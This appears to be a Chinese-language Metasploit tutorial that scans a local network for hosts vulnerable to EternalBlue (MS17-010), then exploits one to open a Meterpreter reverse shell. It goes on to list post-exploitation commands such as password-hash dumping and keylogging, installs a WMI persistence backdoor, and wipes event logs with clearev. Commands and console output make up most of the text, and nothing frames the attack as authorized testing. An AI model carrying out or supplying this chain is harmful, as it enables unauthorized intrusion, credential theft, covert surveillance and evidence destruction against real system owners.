永恒之蓝扫描模块 ,扫描局域网中有那些存在永恒之蓝漏洞
msf5 > search eternalblue Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /home/testpoc/metasploit/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.* RHOSTS => 192.168.1.* msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/smb/smb_ms17_010) > run [-] 192.168.1.2:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [-] 192.168.1.16:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [*] 192.168.1.*:445 - Scanned 33 of 256 hosts (12% complete) [-] 192.168.1.40:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [-] 192.168.1.39:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [-] 192.168.1.48:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [*] 192.168.1.*:445 - Scanned 52 of 256 hosts (20% complete) [*] 192.168.1.*:445 - Scanned 78 of 256 hosts (30% complete) [+] 192.168.1.78:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [+] 192.168.1.88:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit) [-] 192.168.1.96:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [+] 192.168.1.95:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [-] 192.168.1.100:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [*] 192.168.1.*:445 - Scanned 106 of 256 hosts (41% complete) [+] 192.168.1.109:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit) [-] 192.168.1.126:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [-] 192.168.1.124:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [+] 192.168.1.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.*:445 - Scanned 133 of 256 hosts (51% complete)
显示带有 Host is likely VULNERABLE 就是可能存在漏洞的机器
永恒之蓝利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue s[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.78 RHOSTS => 192.168.1.78 msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.78 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.137 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.1.137:4444 [*] 192.168.1.78:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.78:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.78:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.1.78:445 - Connecting to target for exploitation. [+] 192.168.1.78:445 - Connection established for exploitation. [+] 192.168.1.78:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.78:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.78:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.78:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.78:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.78:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.78:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.78:445 - Sending all but last fragment of exploit packet [*] 192.168.1.78:445 - Starting non-paged pool grooming [+] 192.168.1.78:445 - Sending SMBv2 buffers [+] 192.168.1.78:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.78:445 - Sending final SMBv2 buffers. [*] 192.168.1.78:445 - Sending last fragment of exploit packet! [*] 192.168.1.78:445 - Receiving response from exploit packet [+] 192.168.1.78:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.78:445 - Sending egg to corrupted connection. [*] 192.168.1.78:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 192.168.1.78 [*] Meterpreter session 1 opened (192.168.1.137:4444 -> 192.168.1.78:49595) at 2021-02-03 07:32:10 +0000 By[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter >
#成功获取到session
注意,如果payload 不是当前这个 建议使用 set payload windows/x64/meterpreter/reverse_tcp 改成当前这个
获取到session后的常用命令:
help #获取所有可用命令
getuid #获取当前权限
screenshot #截屏
hashdump #获取密码的hash
ps #获取进程列表
sysinfo #获取系统信息
route #获取路由表
getpid #获取当前攻入的进程pid
migrate #将当前后门注入迁移到其他程序
keyscan_start # 开启键盘记录
keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
download/upload #上传下载文件
keyscan_stop # 监视键盘记录
bg # 回到metasploit界面
执行一些命令后 使用bg回到主界面 使用session 可以看到存在一个session ,可以使用 session 1再次进入
获取到权限后 接下来就是留下后门 可以使用 search persistence
msf5 exploit(windows/smb/ms17_010_eternalblue) > search persis Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss 2015-04-08 normal No Arris / Motorola Surfboard SBG6580 Web Interface Takeover 1 auxiliary/scanner/http/lucky_punch normal No HTTP Microsoft SQL Injection Table XSS Infection 2 auxiliary/server/regsvr32_command_delivery_server normal No Regsvr32.exe (.sct) Command Delivery Server 3 exploit/android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution 4 exploit/linux/http/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload 5 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence 6 exploit/linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence 7 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence 8 exploit/linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence 9 exploit/linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence 10 exploit/linux/local/service_persistence 1983-01-01 excellent No Service Persistence 11 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence 12 exploit/multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection 13 exploit/osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer 14 exploit/osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass 15 exploit/unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence 16 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free 17 exploit/windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer 18 exploit/windows/local/persistence_image_exec_options 2008-06-28 excellent No Windows Silent Process Exit Persistence 19 exploit/windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer 20 exploit/windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution 21 exploit/windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell 22 exploit/windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence 23 exploit/windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer 24 exploit/windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy 25 exploit/windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence 26 exploit/windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution 27 payload/cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) 28 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) 29 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 30 payload/php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) 31 payload/php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 32 post/linux/manage/sshkey_persistence excellent No SSH Key Persistence 33 post/windows/gather/enum_ad_managedby_groups normal No Windows Gather Active Directory Managed Groups 34 post/windows/manage/install_ssh normal No Install OpenSSH for Windows 35 post/windows/manage/persistence_exe normal No Windows Manage Persistent EXE Payload Installer 36 post/windows/manage/portproxy normal No Windows Manage Set Port Forwarding With PortProxy 37 post/windows/manage/sshkey_persistence good No SSH Key Persistence 38 post/windows/manage/sticky_keys normal No Sticky Keys Persistance Module
然后选一个顺眼的留下后门
注意 windows 下选择 exploit/windows/local 开头的
如下
msf5 exploit(windows/local/ps_wmi_exec) > use exploit/windows/local/wmi_persistence [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/local/wmi_persistence) > show options Module options (exploit/windows/local/wmi_persistence): Name Current Setting Required Description ---- --------------- -------- ----------- CALLBACK_INTERVAL 1800000 yes Time between callbacks (In milliseconds). (Default: 1800000). CLASSNAME UPDATER yes WMI event class name. (Default: UPDATER) EVENT_ID_TRIGGER 4625 yes Event ID to trigger the payload. (Default: 4625) PERSISTENCE_METHOD EVENT yes Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR) PROCESS_TRIGGER CALC.EXE yes The process name to trigger the payload. (Default: CALC.EXE) SESSION yes The session to run this module on. USERNAME_TRIGGER BOB yes The username to trigger the payload. (Default: BOB) WAITFOR_TRIGGER CALL yes The word to trigger the payload. (Default: CALL) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.137 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port **DisablePayloadHandler: True (no handler will be created!)** Exploit target: Id Name -- ---- 0 Windows msf5 exploit(windows/local/wmi_persistence) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/wmi_persistence) > run
留下后门后 注意清理痕迹
使用sessions 1 进入session
使用clearev 清理痕迹